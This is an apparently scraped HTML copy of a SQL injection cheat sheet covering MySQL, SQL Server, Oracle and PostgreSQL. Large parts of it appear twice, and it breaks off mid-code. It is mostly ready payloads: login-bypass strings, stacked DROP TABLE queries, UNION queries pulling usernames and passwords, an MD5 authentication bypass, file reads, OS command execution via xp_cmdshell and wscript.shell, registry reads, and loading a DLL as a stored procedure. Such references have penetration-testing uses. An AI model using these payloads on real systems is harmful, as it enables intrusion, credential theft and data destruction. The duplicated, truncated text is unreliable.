name="StackingQueries"></a>Stacking Queries </h3>  <p class="idea"><strong>Executing more than one query in one transaction</strong>. This is very useful in every injection point, especially in SQL Server back ended applications. </p>  <ul type="disc">   <li><code>;</code> (S)       <br /><code>SELECT * FROM members<span class="hi">; DROP members--</span></code> </li> </ul>  <p class="idea">Ends a query and starts a new one.</p>  <h4><a id="LangDbFigure" name="LangDbFigure"></a>Language / Database Stacked Query Support Table </h4>  <p class="idea"><strong>green:</strong> supported, <strong>dark gray:</strong> not supported, <strong>light gray: </strong>unknown </p>  <table  cellspacing="1" cellpadding="5" bgcolor="#cccccc"><tbody>     <tr>       <td class="style3" bgcolor="#f7f7f7"> </td>        <td bgcolor="#ffffff"><strong>SQL Server </strong></td>        <td bgcolor="#ffffff"><strong>MySQL</strong></td>        <td bgcolor="#ffffff"><strong>PostgreSQL</strong></td>        <td bgcolor="#ffffff"><strong>ORACLE</strong></td>        <td bgcolor="#ffffff"><strong>MS Access </strong></td>     </tr>      <tr>       <td bgcolor="#ffffff"><strong>ASP</strong></td>        <td bgcolor="#99cc00"> </td>        <td class="style3" bgcolor="#f7f7f7"> </td>        <td class="style3" bgcolor="#f7f7f7"> </td>        <td class="style3" bgcolor="#f7f7f7"> </td>        <td bgcolor="#333333"> </td>     </tr>      <tr>       <td bgcolor="#ffffff"><strong>ASP.NET</strong></td>        <td bgcolor="#99cc00"> </td>        <td class="style3" bgcolor="#f7f7f7"> </td>        <td class="style3" bgcolor="#f7f7f7"> </td>        <td class="style3" bgcolor="#f7f7f7"> </td>        <td bgcolor="#333333"> </td>     </tr>      <tr>       <td bgcolor="#ffffff"><strong>PHP</strong></td>        <td bgcolor="#99cc00"> </td>        <td bgcolor="#333333"> </td>        <td class="style3" bgcolor="#99cc00"> </td>        <td class="style3" bgcolor="#f7f7f7"> </td>        <td bgcolor="#333333"> </td>     </tr>      <tr>       <td bgcolor="#ffffff"><strong>Java</strong></td>        <td class="style3" bgcolor="#f7f7f7"> </td>        <td class="style3" bgcolor="#f7f7f7"> </td>        <td class="style3" bgcolor="#f7f7f7"> </td>        <td bgcolor="#333333"> </td>        <td bgcolor="#333333"> </td>     </tr>   </tbody></table>  <p class="idea"> </p>  <p class="idea"><strong><a id="AboutMySQLandPHP" name="AboutMySQLandPHP"></a>About MySQL and PHP;</strong>     <br />To clarify some issues;     <br /><strong>PHP - MySQL doesn't support stacked queries</strong>, Java doesn't support stacked queries (<em>I'm sure for ORACLE, not quite sure about other databases</em>). <em>Normally MySQL supports stacked queries but because of database layer in most of the configurations it’s not possible to execute second query in PHP-MySQL applications or maybe MySQL client supports this, not quite sure. Can someone clarify?</em></p>  <h5><a id="StackedSamples" name="StackedSamples"></a>Stacked SQL Injection Attack Samples </h5>  <ul type="disc">   <li><span class="inputfield">ID:</span> <code>10;DROP members --</code> </li>    <li><code>SELECT * FROM products WHERE id = 10<span class="hi">; DROP members--</span></code> </li> </ul>  <p class="idea">This will run <em>DROP members</em> SQL sentence after normal SQL Query.     <br /></p>  <h3><a id="IfStatements" name="IfStatements"></a>If Statements </h3>  <p class="idea">Get response based on a if statement. This is <strong>one of the key points of Blind SQL Injection</strong>, also can be very useful to test simple stuff blindly and <strong>accurately</strong>.</p>  <h4><a id="MySQLIf" name="MySQLIf"></a>MySQL If Statement</h4>  <ul>   <li><code>IF(<strong><em>condition</em>,<em>true-part</em>,<em>false-part</em></strong>) </code>(M)<code>        <br />SELECT IF(1=1,'true','false')</code> </li> </ul>  <h4><a id="SQLServerIf" name="SQLServerIf"></a>SQL Server If Statement </h4>  <ul>   <li><code>IF <strong><em>condition</em></strong> <strong><em>true-part</em></strong> ELSE <strong><em>false-part</em></strong></code> (S)       <br /><code>IF (1=1) SELECT 'true' ELSE SELECT 'false'</code> </li> </ul>  <h5><a id="SampleIfStatements" name="SampleIfStatements"></a>If Statement SQL Injection Attack Samples </h5>  <p><code>if ((select user) = 'sa' OR (select user) = 'dbo') select 1 else select 1/0</code> (S)     <br /><span class="idea">This will throw an <strong>divide by zero error</strong> if current logged user is not <strong>"sa" or "dbo"</strong>.</span></p>  <h3><a id="UsingIntegers" name="UsingIntegers"></a>Using Integers </h3>  <p class="idea">Very useful for bypassing, <strong>magic_quotes() and similar filters</strong>, or even WAFs. </p>  <ul type="disc">   <li><code>0x<em>HEXNUMBER</em></code> (SM)       <br /><span class="idea">You can  write hex like these;</span>       <br />      <br /><code>SELECT CHAR(0x66)</code> (S)       <br /><code>SELECT 0x5045</code> <span class="idea">(<em>this is not an integer it will be a string from Hex</em>)</span> (M)       <br /><code>SELECT 0x50 + 0x45</code> <span class="idea">(<em>this is integer now!</em>)</span> (M) </li> </ul>  <h3><a id="StringOperations" name="StringOperations"></a>String  Operations </h3>  <p class="idea">String related operations. These can be quite useful to build up injections which are not using any quotes, bypass any other black listing or determine back end database.</p>  <h4><a id="StringConcat" name="StringConcat"></a>String Concatenation </h4>  <ul type="disc">   <li><code>+</code> (S)       <br /><code>SELECT login <span class="hi">+ '-' +</span> password FROM members</code>       <br />      <br /></li>    <li><code>||</code> (*MO)       <br /><code>SELECT login <span class="hi">|| '-' ||</span> password FROM members </code></li> </ul>  <p class="idea"><strong>*About MySQL "||";</strong>     <br />If MySQL is running in ANSI mode it’s going to work but otherwise MySQL accept it as `logical operator` it’ll return 0. Better way to do it is using <code>CONCAT()</code> function in MySQL.</p>  <ul type="disc">   <li><code>CONCAT(str1, str2, str3, ...)</code> (M)       <br /><span class="idea">Concatenate supplied strings.</span>       <br /><code>SELECT <span class="hi">CONCAT(login, password)</span> FROM members</code> </li> </ul>  <h3><a id="StringwithoutQuotes" name="StringwithoutQuotes"></a>Strings without Quotes </h3>  <p class="idea">These are some direct ways to using strings but it’s always possible to use <code>CHAR()</code>(MS) and <code>CONCAT()</code>(M) to generate string without quotes.</p>  <ul type="disc">   <li><code>0x457578</code> (M) - <span class="idea">Hex Representation of string </span>      <br /><code>SELECT 0x457578</code>       <br /><span class="idea">This will be selected as string in MySQL.</span>       <br />      <br /><span class="idea">In MySQL easy way to generate hex representations of strings use this;</span>       <br /><code>SELECT CONCAT('0x',HEX('c:\\boot.ini'))</code>       <br />      <br /></li>    <li><span class="idea">Using <code>CONCAT()</code> in MySQL</span>       <br /><code>SELECT CONCAT(CHAR(75),CHAR(76),CHAR(77))</code> (M)       <br /><span class="idea">This will return ‘KLM’.</span>       <br />      <br /></li>    <li><code>SELECT CHAR(75)+CHAR(76)+CHAR(77)</code> (S)       <br /><span class="idea">This will return ‘KLM’. </span></li> </ul>  <h4><a id="HexbasedSamples" name="HexbasedSamples"></a>Hex based SQL Injection Samples</h4>  <ul>   <li><code>SELECT LOAD_FILE(<span class="hi">0x633A5C626F6F742E696E69</span>)</code> (M)       <br /><span class="idea">This will show the content of <strong>c:\boot.ini</strong></span> </li> </ul>  <h3><a id="StringModification" name="StringModification"></a>String Modification & Related </h3>  <ul type="disc">   <li><code>ASCII()</code> (SMP)       <br /><span class="idea">Returns ASCII character value of leftmost character. A must have function for Blind SQL Injections.</span>       <br />      <br /><code>SELECT ASCII('a')</code>       <br />      <br /></li>    <li><code>CHAR()</code> (SM)       <br /><span class="idea">Convert an integer of ASCII.</span>       <br />      <br /><code>SELECT CHAR(64)</code> </li> </ul>  <h2><a id="UnionInjections" name="UnionInjections"></a>Union Injections</h2>  <p class="idea">With union you do SQL queries cross-table. Basically you can poison query to return records from another table. </p>  <p><code>SELECT header, txt FROM news UNION ALL SELECT name, pass FROM members </code>    <br /><span class="idea">This will combine results from both news table and members table and return all of them. </span></p>  <p><span class="idea">Another Example : </span>    <br /><code>' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--</code></p>  <h3><a id="UnionLanguageIssues" name="UnionLanguageIssues"></a>UNION – Fixing Language Issues</h3>  <p class="idea">While exploiting Union injections sometimes you get errors because of different language settings (<em>table settings, field settings, combined table / db settings etc.</em>) these functions are quite useful to fix this problem. It's rare but if you dealing with <em>Japanese, Russian, Turkish</em> etc. applications then you will see it. </p>  <ul>   <li>SQL Server (S)      <br />Use <span class="hi"><code>field</code> <strong><code>COLLATE</code></strong><code> SQL_Latin1_General_Cp1254_CS_AS</code></span> or some other valid one - <em>check out SQL Server documentation</em>.       <br />      <br /><code>SELECT header FROM news UNION ALL SELECT name COLLATE SQL_Latin1_General_Cp1254_CS_AS FROM members</code>       <br />      <br /></li>    <li>MySQL (M)      <br /><code>Hex() </code><span class="idea">for every possible issue</span> </li> </ul>  <h3><a id="ByPassingLoginScreens" name="ByPassingLoginScreens"></a>Bypassing Login Screens (SMO+) </h3> <span class="idea"><em>SQL Injection 101</em>, Login tricks </span>  <ul>   <li><code>admin' -- </code></li>    <li><code>admin' # </code></li>    <li><code>admin'/*</code> </li>    <li><code>' or 1=1--</code> </li>    <li><code>' or 1=1#</code> </li>    <li><code>' or 1=1/*</code> </li>    <li><code>') or '1'='1--</code> </li>    <li><code>') or ('1'='1--</code> </li>    <li>.... </li> </ul>  <ul>   <li>Login as different user (SM*)      <br /><code>' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--</code> </li> </ul>  <p><em>*Old versions of MySQL doesn't support union queries </em></p>  <h3><a id="UnionLanguageIssues" name="UnionLanguageIssues"></a>Bypassing second MD5 hash check login screens </h3>  <p class="idea">If application is first getting the record by username and then compare returned MD5 with supplied password's MD5 then you need to some extra tricks to fool application to bypass authentication. You can union results with a known password and MD5 hash of supplied password. In this case application will compare your password and your supplied MD5 hash instead of MD5 from database. </p>  <h4><a id="BypassingMD5Hash" name="BypassingMD5Hash"></a>Bypassing MD5 Hash Check Example (MSP) </h4>  <p><span class="inputfield">Username :</span><code> admin</code>     <br /><span class="inputfield">Password :</span> <code>1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055</code></p>  <p><code>81dc9bdb52d04dc20036dbd8313ed055 = MD5(1234) </code></p>  <h3> </h3>  <h3>Error Based - Find Columns Names </h3>  <h4>Finding Column Names with <strong>HAVING BY</strong> - Error Based (S) </h4>  <p><em>In the same order, </em></p>  <ul>   <li>'<code> HAVING 1=1 -- </code></li>    <li><code>' GROUP BY <strong class="hi">table.columnfromerror1</strong> HAVING 1=1 -- </code></li>    <li><code>' GROUP BY <strong class="hi">table.columnfromerror1, columnfromerror2</strong> HAVING 1=1 --</code> </li>    <li><code>' GROUP BY <strong class="hi">table.columnfromerror1, columnfromerror2, columnfromerror(n) </strong>HAVING 1=1 --</code> <em>and so on</em> </li>    <li>If you are not getting any more error then it's done. </li> </ul>  <h4>Finding how many columns in SELECT query by <strong>ORDER BY</strong> <strong>(MSO+)</strong></h4>  <p>Finding column number by ORDER BY can speed up the UNION SQL Injection process.</p>  <ul>   <li><code>ORDER BY 1-- </code></li>    <li><code>ORDER BY 2--</code> </li>    <li><code>ORDER BY N--</code> <em>so on</em> </li>    <li>Keep going until get an error. Error means you found the number of selected columns. </li> </ul>  <h3>Data types, UNION, etc. </h3>  <h4>Hints,</h4>  <ul>   <li>Always use <strong>UNION</strong> with <strong>ALL </strong>because of <strong>image</strong> similar non-distinct field types. By default union tries to get records with distinct. </li>    <li>To get rid of unrequired records from left table use -1 or any not exist record search in the beginning of query (<em>if injection is in WHERE</em>). This can be critical if you are only getting one result at a time. </li>    <li>Use NULL in UNION injections for most data type instead of trying to guess string, date, integer etc.      <ul>       <li>Be careful in Blind situtaions may you can understand error is coming from DB or application itself. Because languages like ASP.NET generally throws errors while trying to use NULL values (<em>because normally developers are not expecting to see NULL in a username field</em>) </li>     </ul>   </li> </ul>  <h4>Finding Column Type </h4>  <ul>   <li><code>' union select <span class="hi">sum(<strong>columntofind</strong>)</span> from <strong>users</strong>--</code> (S)       <br /><code>Microsoft OLE DB Provider for ODBC Drivers error '80040e07'        <br />[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a <strong class="hi">varchar</strong> data type as an argument.</code>       <br />      <br /><em>If you are not getting error it means </em>column is numeric.       <br />      <br /></li>    <li>Also you can use <span class="hi">CAST()</span> or <span class="hi">CONVERT()</span>       <ul>       <li><code>SELECT * FROM Table1 WHERE id = -1 UNION ALL SELECT null, null, NULL, NULL, convert(image,1), null, null,NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULl, NULL--</code>           <br />          <br /></li>     </ul>   </li>    <li><code>11223344) UNION SELECT NULL,NULL,NULL,NULL WHERE 1=2 –-</code>       <br />No Error - Syntax is right. MS SQL Server Used. Proceeding.       <br />      <br /></li>    <li><code>11223344) UNION SELECT 1,NULL,NULL,NULL WHERE 1=2 –-</code>       <br />No Error – First column is an integer.       <br />      <br /></li>    <li><code>11223344) UNION SELECT 1,2,NULL,NULL WHERE 1=2 -- </code>      <br />Error! – Second column is not an integer.       <br />      <br /></li>    <li><code>11223344) UNION SELECT 1,’2’,NULL,NULL WHERE 1=2 –-</code>       <br />No Error – Second column is a string.       <br />      <br /></li>    <li><code>11223344) UNION SELECT 1,’2’,3,NULL WHERE 1=2 –-</code>       <br />Error! – Third column is not an integer. ...       <br />      <br /><code>Microsoft OLE DB Provider for SQL Server error '80040e07'        <br />Explicit conversion from data type <span class="hi"><strong>int</strong> to image</span> is not allowed.</code> </li> </ul>  <p><strong>You’ll get convert() errors before union target errors ! </strong>So<strong> </strong>start with<strong> </strong>convert() then union<strong></strong></p>  <h3>Simple Insert (MSO+) </h3> <code>'; insert into users values( 1, 'hax0r', 'coolpass', 9 )/*</code>   <h3>Useful Function / Information Gathering / Stored Procedures / Bulk SQL Injection Notes</h3>  <p><strong>@@version</strong> (MS)     <br />Version of database and more details for SQL Server. It's a constant. You can just select it like any other column, you don't need to supply table name. Also you can use insert, update statements or in functions. </p>  <p><code>INSERT INTO members(id, user, pass) VALUES(1, ''+<span class="hi">SUBSTRING(@@version,1,10)</span> ,10)</code></p>  <h4><a id="BulkInsert" name="BulkInsert"></a>Bulk Insert (S) </h4>  <p>Insert a file content to a table. If you don't know internal path of web application you can <strong>read IIS (</strong><em>IIS 6 only</em><strong>) metabase file </strong>(<em>%systemroot%\system32\inetsrv\MetaBase.xml</em>) and then search in it to identify application path. </p>  <ol>   <ol>     <li>Create table foo( line varchar(8000) ) </li>      <li>bulk insert foo from 'c:\inetpub\wwwroot\login.asp' </li>      <li><em>Drop temp table, and repeat for another file. </em></li>   </ol> </ol>  <h4>BCP (S) </h4>  <p>Write text file. Login Credentials are required to use this function.    <br /><code>bcp "SELECT * FROM test..foo" queryout c:\inetpub\wwwroot\runcommand.asp -c -Slocalhost -Usa -Pfoobar </code></p>  <h4>VBS, WSH in SQL Server (S) </h4>  <p>You can use VBS, WSH scripting in SQL Server because of ActiveX support. </p>  <p><code>declare @o int      <br />exec sp_oacreate 'wscript.shell', @o out       <br />exec sp_oamethod @o, 'run', NULL, 'notepad.exe'       <br /></code><code><em>Username:</em> '; declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'notepad.exe' --       <br /></code></p>  <h4>Executing system commands, xp_cmdshell (S) </h4>  <p>Well known trick, By default it's disabled in <em>SQL Server 2005. </em>You need to have admin access. </p>  <p><code>EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:'</code>     <br /></p>  <p>Simple ping check (<em>configure your firewall or sniffer to identify request before launch it</em>), </p>  <p><code>EXEC master.dbo.xp_cmdshell 'ping <ip address>'</code></p>  <p>You can not read results directly from error or union or something else. </p>  <h4>Some Special Tables in SQL Server (S) </h4>  <ul>   <li>Error Messages      <br /><code>master..sysmessages </code>      <br />      <br /></li>    <li>Linked Servers      <br /><code>master..sysservers</code>       <br />      <br /></li>    <li>Password (<em>2000 and 20005 both can be crackable, they use very similar hashing algorithm </em>)       <br />SQL Server 2000:<code> masters..sysxlogins</code>       <br />SQL Server 2005 : <code>sys.sql_logins        <br /></code></li> </ul>  <h4>More Stored Procedures for SQL Server (S) </h4>  <ol>   <li>Cmd Execute (<strong>xp_cmdshell</strong>)       <br />exec master..xp_cmdshell 'dir'       <br />      <br /></li>    <li>Registry Stuff (<strong>xp_regread</strong>)       <br />      <ol>       <li>xp_regaddmultistring </li>        <li>xp_regdeletekey </li>        <li>xp_regdeletevalue </li>        <li>xp_regenumkeys </li>        <li>xp_regenumvalues </li>        <li>xp_regread </li>        <li>xp_regremovemultistring </li>        <li>xp_regwrite          <br />exec xp_regread HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\lanmanserver\parameters', 'nullsessionshares'           <br />exec xp_regenumvalues HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\snmp\parameters\validcommunities'           <br />          <br /></li>     </ol>   </li>    <li>Managing Services (<strong>xp_servicecontrol</strong>)       <br /></li>    <li>Medias (<strong>xp_availablemedia</strong>)       <br /></li>    <li>ODBC Resources (<strong>xp_enumdsn</strong>)       <br /></li>    <li>Login mode (<strong>xp_loginconfig</strong>)       <br /></li>    <li>Creating Cab Files (<strong>xp_makecab</strong>)       <br /></li>    <li>Domain Enumeration (<strong>xp_ntsec_enumdomains</strong>)       <br /></li>    <li>Process Killing (<em>need PID</em>) (<strong>xp_terminate_process</strong>)       <br /></li>    <li>Add new procedure (<em>virtually you can execute whatever you want</em>)       <br />sp_addextendedproc ‘xp_webserver’, ‘c:\temp\x.dll’       <br />exec xp_webserver </li>    <li>Write text file to a UNC or an internal path (sp_makewebtask)      <br /></li> </ol>  <h4>MSSQL Bulk Notes </h4>  <p><code>SELECT * FROM master..sysprocesses /*WHERE spid=@@SPID*/ </code></p>  <p><code>DECLARE @result int; EXEC @result = xp_cmdshell 'dir *.exe';IF (@result = 0) SELECT 0 ELSE SELECT 1/0</code></p>  <p>HOST_NAME()    <br />IS_MEMBER (Transact-SQL)  <br />IS_SRVROLEMEMBER (Transact-SQL)  <br />OPENDATASOURCE (Transact-SQL) </p>  <pre>INSERT tbl EXEC master..xp_cmdshell OSQL /Q"DBCC SHOWCONTIG"</pre>
+    <div class="post"><p> </p>  <h2><em>Find and exploit SQL Injections with <a href="http://www.mavitunasecurity.com/">Netsparker, Next Generation Web Application Security Scanner</a></em></h2>  <p> </p>  <p><em>SQL Injection Cheat Sheet, <strong>Document Version 1.4</strong></em></p>  <h2><a id="about" name="about"></a>About SQL Injection Cheat Sheet </h2>  <p>Currently only for <strong>MySQL</strong> and <strong>Microsoft SQL Server, </strong>some <strong>ORACLE</strong> and some <strong>PostgreSQL</strong>. Most of samples are not correct for every single situation. Most of the real world environments may change because of parenthesis, different code bases and unexpected, strange SQL sentences.     <br />    <br />Samples are provided to allow reader to get basic idea of a potential attack and almost every section includes a brief information about itself. </p>  <table  cellspacing="3" cellpadding="3"><tbody>     <tr>       <td align="right"><strong>M : </strong></td>        <td>MySQL </td>     </tr>      <tr>       <td align="right"><strong>S : </strong></td>        <td>SQL Server</td>     </tr>      <tr>       <td align="right"><strong>P : </strong></td>        <td>PostgreSQL</td>     </tr>      <tr>       <td align="right"><strong>O : </strong></td>        <td>Oracle</td>     </tr>      <tr>       <td align="right"><strong>+ : </strong></td>        <td>Possibly all other databases </td>     </tr>   </tbody></table>  <h5><em><strong>Examples;</strong></em></h5>  <ul>   <li><em>(MS) means : MySQL and SQL Server etc. </em></li>    <li>(M*S) means : Only in some versions of MySQL or special conditions see related note and SQL Server </li> </ul>  <h2><a id="TOC" name="TOC"></a>Table Of Contents </h2>  <ol>   <li><a href="#about">About SQL Injection Cheat Sheet </a></li>    <li><a href="#SyntaxBasicAttacks">Syntax Reference, Sample Attacks and Dirty SQL Injection Tricks </a>      <ol>       <li><a href="#LineComments">Line Comments </a>          <ul>           <li><a href="#LineCommentAttacks">SQL Injection Attack Samples</a> </li>         </ul>       </li>        <li><a href="#InlineComments">Inline Comments </a>          <ul>           <li><a href="#InlineSamples">Classical Inline Comment SQL Injection Attack Samples</a> </li>            <li><a href="#MySQLInlineSamples">MySQL Version Detection Sample Attacks</a> </li>         </ul>       </li>        <li><a href="#StackingQueries">Stacking Queries</a>           <ul>           <li><a href="#LangDbFigure">Language / Database Stacked Query Support Table </a></li>            <li><a href="#AboutMySQLandPHP">About MySQL and PHP</a> </li>            <li><a href="#StackedSamples">Stacked SQL Injection Attack Samples</a> </li>         </ul>       </li>        <li><a href="#IfStatements">If Statements</a>           <ul>           <li><a href="#MySQLIf">MySQL If Statement</a> </li>            <li><a href="#SQLServerIf">SQL Server If Statement </a></li>            <li><a href="#SampleIfStatements">If Statement SQL Injection Attack Samples </a></li>         </ul>       </li>        <li><a href="#UsingIntegers">Using Integers </a></li>        <li><a href="#StringOperations">String  Operations</a>           <ul>           <li><a href="#StringConcat">String Concatenation </a></li>         </ul>       </li>        <li><a href="#StringwithoutQuotes">Strings without Quotes</a>           <ul>           <li><a href="#HexbasedSamples">Hex based SQL Injection Samples</a> </li>         </ul>       </li>        <li><a href="#StringModification">String Modification & Related </a></li>        <li><a href="#UnionInjections">Union Injections</a>           <ul>           <li><a href="#UnionLanguageIssues">UNION – Fixing Language Issues</a> </li>         </ul>       </li>        <li><a href="#ByPassingLoginScreens">Bypassing Login Screens</a> </li>        <li><a href="#Enablecmdshell">Enabling xp_cmdshell in SQL Server 2005 </a></li>        <li><em>Other parts are not so well formatted but check out by yourself, drafts, notes and stuff, scroll down and see. </em></li>     </ol>   </li> </ol>  <h2><a id="SyntaxBasicAttacks" name="SyntaxBasicAttacks"></a>Syntax Reference, Sample Attacks and Dirty SQL Injection Tricks </h2>  <h3 class="style2"><a id="21" name="21"></a>Ending / Commenting Out / Line Comments </h3>  <h4><a id="LineComments" name="LineComments"></a>Line Comments </h4>  <p class="idea"><strong>Comments out rest of the query.</strong>     <br />Line comments are generally useful for ignoring rest of the query so you don’t have to deal with fixing the syntax.</p>  <ul type="disc">   <li><code>-- </code>(SM)<code>        <br />DROP sampletable;<span class="hi">--</span>         <br />        <br /></code></li>    <li><code># </code>(M)<code>        <br />DROP sampletable;<span class="hi">#</span></code> </li> </ul>  <h5><a id="LineCommentAttacks" name="LineCommentAttacks"></a>Line Comments Sample SQL Injection Attacks</h5>  <ul type="disc">   <li><span class="inputfield">Username:</span><code> admin<span class="hi">'--</span> </code></li>    <li><code>SELECT * FROM members WHERE username = '<span class="hi">admin'--</span><span class="comment">' AND password = 'password'</span>         <br /></code><span class="idea">This is going to log you as admin user, because rest of the SQL query will be ignored.</span> </li> </ul>  <h4><a id="InlineComments" name="InlineComments"></a>Inline Comments</h4>  <p class="idea"><strong>Comments out rest of the query by not closing them</strong> or you can use for <strong>bypassing blacklisting</strong>, removing spaces, obfuscating and determining database versions.</p>  <ul type="disc">   <li><code>/*Comment Here*/</code> (SM)       <ul>       <li><code>DROP<span class="hi">/*comment*/</span>sampletable</code> </li>        <li><code>DR<span class="hi">/**/</span>OP<span class="hi">/*bypass blacklisting*/</span>sampletable</code> </li>        <li><code>SELECT<span class="hi">/*avoid-spaces*/</span>password<span class="hi">/**/</span>FROM<span class="hi">/**/</span>Members</code>           <br />          <br /></li>     </ul>   </li>    <li><code>/*! MYSQL Special SQL *</code>/ (M)       <br /><span class="idea">This is a special comment syntax for MySQL. It’s perfect for detecting MySQL version. If you put a code into this comments it’s going to execute in MySQL only. Also you can use this to execute some code only if the server is higher than supplied version.</span>       <br />      <br /><code>SELECT <span class="hi">/*!<strong>32302</strong> 1/0, */</span> 1 FROM tablename</code> </li> </ul>  <h5><a id="InlineSamples" name="InlineSamples"></a>Classical Inline Comment SQL Injection Attack Samples </h5>  <ul type="disc">   <li><span class="inputfield">ID:</span> <code>10; DROP TABLE members <span class="hi">/*</span></code>       <br /><span class="idea">Simply get rid of other stuff at the end the of query. Same as <code>10; DROP TABLE members <span class="hi">--</span></code></span>       <br />      <br /></li>    <li><code>SELECT <span class="hi">/*!<strong>32302</strong> 1/0, */</span> 1 FROM tablename</code>       <br /><span class="idea">Will throw an <strong>division by 0 error </strong>if MySQL version is higher than <strong>3.23.02</strong></span> </li> </ul>  <h5><a id="MySQLInlineSamples" name="MySQLInlineSamples"></a>MySQL Version Detection Sample Attacks</h5>  <ul type="disc">   <li><span class="inputfield">ID:</span> <span class="hi"><code>/*!</code></span><code><strong>32302</strong> 10<span class="hi">*/</span> </code></li>    <li><span class="inputfield">ID:</span> <code>10</code>       <br /><span class="idea">You will get the <strong>same response</strong> if MySQL version is higher than <strong>3.23.02</strong></span>       <br />      <br /></li>    <li><code>SELECT <span class="hi">/*!<strong>32302</strong> 1/0, */</span> 1 FROM tablename</code>       <br /><span class="idea">Will throw an <strong>division by 0 error </strong>if MySQL version is higher than <strong>3.23.02</strong></span> </li> </ul>  <h3><a id="StackingQueries" name="StackingQueries"></a>Stacking Queries </h3>  <p class="idea"><strong>Executing more than one query in one transaction</strong>. This is very useful in every injection point, especially in SQL Server back ended applications. </p>  <ul type="disc">   <li><code>;</code> (S)       <br /><code>SELECT * FROM members<span class="hi">; DROP members--</span></code> </li> </ul>  <p class="idea">Ends a query and starts a new one.</p>  <h4><a id="LangDbFigure" name="LangDbFigure"></a>Language / Database Stacked Query Support Table </h4>  <p class="idea"><strong>green:</strong> supported, <strong>dark gray:</strong> not supported, <strong>light gray: </strong>unknown </p>  <table  cellspacing="1" cellpadding="5" bgcolor="#cccccc"><tbody>     <tr>       <td class="style3" bgcolor="#f7f7f7"> </td>        <td bgcolor="#ffffff"><strong>SQL Server </strong></td>        <td bgcolor="#ffffff"><strong>MySQL</strong></td>        <td bgcolor="#ffffff"><strong>PostgreSQL</strong></td>        <td bgcolor="#ffffff"><strong>ORACLE</strong></td>        <td bgcolor="#ffffff"><strong>MS Access </strong></td>     </tr>      <tr>       <td bgcolor="#ffffff"><strong>ASP</strong></td>        <td bgcolor="#99cc00"> </td>        <td class="style3" bgcolor="#f7f7f7"> </td>        <td class="style3" bgcolor="#f7f7f7"> </td>        <td class="style3" bgcolor="#f7f7f7"> </td>        <td bgcolor="#333333"> </td>     </tr>      <tr>       <td bgcolor="#ffffff"><strong>ASP.NET</strong></td>        <td bgcolor="#99cc00"> </td>        <td class="style3" bgcolor="#f7f7f7"> </td>        <td class="style3" bgcolor="#f7f7f7"> </td>        <td class="style3" bgcolor="#f7f7f7"> </td>        <td bgcolor="#333333"> </td>     </tr>      <tr>       <td bgcolor="#ffffff"><strong>PHP</strong></td>        <td bgcolor="#99cc00"> </td>        <td bgcolor="#333333"> </td>        <td class="style3" bgcolor="#99cc00"> </td>        <td class="style3" bgcolor="#f7f7f7"> </td>        <td bgcolor="#333333"> </td>     </tr>      <tr>       <td bgcolor="#ffffff"><strong>Java</strong></td>        <td class="style3" bgcolor="#f7f7f7"> </td>        <td class="style3" bgcolor="#f7f7f7"> </td>        <td class="style3" bgcolor="#f7f7f7"> </td>        <td bgcolor="#333333"> </td>        <td bgcolor="#333333"> </td>     </tr>   </tbody></table>  <p class="idea"> </p>  <p class="idea"><strong><a id="AboutMySQLandPHP" name="AboutMySQLandPHP"></a>About MySQL and PHP;</strong>     <br />To clarify some issues;     <br /><strong>PHP - MySQL doesn't support stacked queries</strong>, Java doesn't support stacked queries (<em>I'm sure for ORACLE, not quite sure about other databases</em>). <em>Normally MySQL supports stacked queries but because of database layer in most of the configurations it’s not possible to execute second query in PHP-MySQL applications or maybe MySQL client supports this, not quite sure. Can someone clarify?</em></p>  <h5><a id="StackedSamples" name="StackedSamples"></a>Stacked SQL Injection Attack Samples </h5>  <ul type="disc">   <li><span class="inputfield">ID:</span> <code>10;DROP members --</code> </li>    <li><code>SELECT * FROM products WHERE id = 10<span class="hi">; DROP members--</span></code> </li> </ul>  <p class="idea">This will run <em>DROP members</em> SQL sentence after normal SQL Query.     <br /></p>  <h3><a id="IfStatements" name="IfStatements"></a>If Statements </h3>  <p class="idea">Get response based on a if statement. This is <strong>one of the key points of Blind SQL Injection</strong>, also can be very useful to test simple stuff blindly and <strong>accurately</strong>.</p>  <h4><a id="MySQLIf" name="MySQLIf"></a>MySQL If Statement</h4>  <ul>   <li><code>IF(<strong><em>condition</em>,<em>true-part</em>,<em>false-part</em></strong>) </code>(M)<code>        <br />SELECT IF(1=1,'true','false')</code> </li> </ul>  <h4><a id="SQLServerIf" name="SQLServerIf"></a>SQL Server If Statement </h4>  <ul>   <li><code>IF <strong><em>condition</em></strong> <strong><em>true-part</em></strong> ELSE <strong><em>false-part</em></strong></code> (S)       <br /><code>IF (1=1) SELECT 'true' ELSE SELECT 'false'</code> </li> </ul>  <h5><a id="SampleIfStatements" name="SampleIfStatements"></a>If Statement SQL Injection Attack Samples </h5>  <p><code>if ((select user) = 'sa' OR (select user) = 'dbo') select 1 else select 1/0</code> (S)     <br /><span class="idea">This will throw an <strong>divide by zero error</strong> if current logged user is not <strong>"sa" or "dbo"</strong>.</span></p>  <h3><a id="UsingIntegers" name="UsingIntegers"></a>Using Integers </h3>  <p class="idea">Very useful for bypassing, <strong>magic_quotes() and similar filters</strong>, or even WAFs. </p>  <ul type="disc">   <li><code>0x<em>HEXNUMBER</em></code> (SM)       <br /><span class="idea">You can  write hex like these;</span>       <br />      <br /><code>SELECT CHAR(0x66)</code> (S)       <br /><code>SELECT 0x5045</code> <span class="idea">(<em>this is not an integer it will be a string from Hex</em>)</span> (M)       <br /><code>SELECT 0x50 + 0x45</code> <span class="idea">(<em>this is integer now!</em>)</span> (M) </li> </ul>  <h3><a id="StringOperations" name="StringOperations"></a>String  Operations </h3>  <p class="idea">String related operations. These can be quite useful to build up injections which are not using any quotes, bypass any other black listing or determine back end database.</p>  <h4><a id="StringConcat" name="StringConcat"></a>String Concatenation </h4>  <ul type="disc">   <li><code>+</code> (S)       <br /><code>SELECT login <span class="hi">+ '-' +</span> password FROM members</code>       <br />      <br /></li>    <li><code>||</code> (*MO)       <br /><code>SELECT login <span class="hi">|| '-' ||</span> password FROM members 